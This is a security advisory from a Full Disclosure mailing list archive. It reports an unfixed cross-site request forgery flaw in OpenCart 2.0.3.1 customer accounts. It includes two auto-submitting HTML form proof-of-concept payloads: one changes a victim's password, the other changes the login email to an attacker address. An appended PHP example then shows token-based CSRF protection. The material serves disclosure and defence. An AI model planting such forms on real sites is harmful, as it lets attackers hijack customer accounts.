Full Disclosure mailing list archives
OpenCart 2.0.3.1: CSRF
From: "Curesec Research Team (CRT)" <crt () curesec com>
Date: Tue, 03 Nov 2015 11:53:44 +0100
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    OpenCart 2.0.3.1
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      https://www.opencart.com/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Vulnerability Description

While CSRF protection exists for the actions of an admin, it does not exist
for customers. This means that customer accounts can be compromised by an
attacker if the victim visits an attacker-controlled website while logged in.

This issue was already discovered in 2013 by Saadat Ullah, but new versions
of OpenCart are still vulnerable as no fix has been released.

3. Proof of Concept

Change Password:

<form name="myform" method="post"
action="http://localhost/opencart-2.0.3.1/upload/index.php?route=account/password">
<input type="hidden" name="password" value="12345">
<input type="hidden" name="confirm" value="12345">
</form>
<script>document.myform.submit();</script>

Change profile information, including email address, which is used when
logging in:

<form name="myform" method="post"
action="http://localhost/opencart-2.0.3.1/upload/index.php?route=account/edit">
<input type="hidden" name="currency" value="USD">
<input type="hidden" name="language" value="en">
<input type="hidden" name="firstname" value="Jane">
<input type="hidden" name="lastname" value="Smith">
<input type="hidden" name="email" value="attacker () evil com">
<input type="hidden" name="telephone" value="1234567">
</form>
<script>document.myform.submit();</script>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/23/2015 Vendor points out that issue is already known, and that they do not
           plan on releasing a fix
10/07/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/OpenCart-2031-CSRF-66.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
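The root cause in section 2 above is that the customer-facing handlers accept any authenticated POST, so the browser's automatic cookie attachment is all the forged form needs. The following is an added example, not OpenCart's code and not part of the advisory, showing the synchronizer-token pattern the admin side already uses applied to a customer "change password" handler: the handler as described in the advisory next to a token-checked version, plus the form that carries the token. All function names (csrf_token, csrf_valid, change_password_vulnerable, change_password_protected, render_password_form) and the session layout are assumptions for illustration.

```php
<?php
// Added example (hypothetical names, not OpenCart's own code): synchronizer-token
// CSRF protection for a customer-facing "change password" action.

session_start();

// Issue one random token per session and render it into every state-changing form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Validate the token submitted with a POST. hash_equals() compares in constant
// time so the check does not leak the token through timing differences.
function csrf_valid(array $post): bool {
    if (empty($_SESSION['csrf_token']) || !isset($post['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], (string) $post['csrf_token']);
}

// Handler as the advisory describes it: a logged-in session is the only check,
// so a cross-site auto-submitted form succeeds.
function change_password_vulnerable(array $post): string {
    if (!isset($_SESSION['customer_id'])) {
        return 'not logged in';
    }
    // ... update the password of $_SESSION['customer_id'] here ...
    return 'password changed';
}

// Hardened handler: the request must also carry the per-session token, which an
// attacker-controlled page cannot read and therefore cannot include.
function change_password_protected(array $post): string {
    if (!isset($_SESSION['customer_id'])) {
        return 'not logged in';
    }
    if (!csrf_valid($post)) {
        http_response_code(403);
        return 'invalid CSRF token';
    }
    if (($post['password'] ?? '') === '' || ($post['password'] ?? '') !== ($post['confirm'] ?? '')) {
        return 'passwords do not match';
    }
    // ... update the password of $_SESSION['customer_id'] here ...
    return 'password changed';
}

// The legitimate form: a hidden field carries the session token back to the server.
function render_password_form(string $action): string {
    $token  = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    $action = htmlspecialchars($action, ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="' . $action . '">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input type="password" name="password">'
         . '<input type="password" name="confirm">'
         . '<button type="submit">Change password</button>'
         . '</form>';
}

// Constructed demonstration: a logged-in customer session, then the field set a
// forged form like the advisory's PoC would submit (no token) versus a request
// that came from the rendered form (token present).
$_SESSION['customer_id'] = 42;
$forged = ['password' => '12345', 'confirm' => '12345'];
$legit  = $forged + ['csrf_token' => csrf_token()];

echo 'vulnerable handler, forged POST:  ', change_password_vulnerable($forged), PHP_EOL;
echo 'protected handler, forged POST:   ', change_password_protected($forged), PHP_EOL;
echo 'protected handler, legitimate POST: ', change_password_protected($legit), PHP_EOL;
echo render_password_form('index.php?route=account/password'), PHP_EOL;
```

Run it from the command line with `php example.php`; the forged request passes the vulnerable handler and is rejected by the protected one, while the request carrying the token succeeds. The same check belongs on every customer action that changes state (the account/edit route from the PoC included), not only on password changes. Marking the session cookie SameSite is a useful complementary measure, but it depends on browser support, so the server-side token remains the primary control.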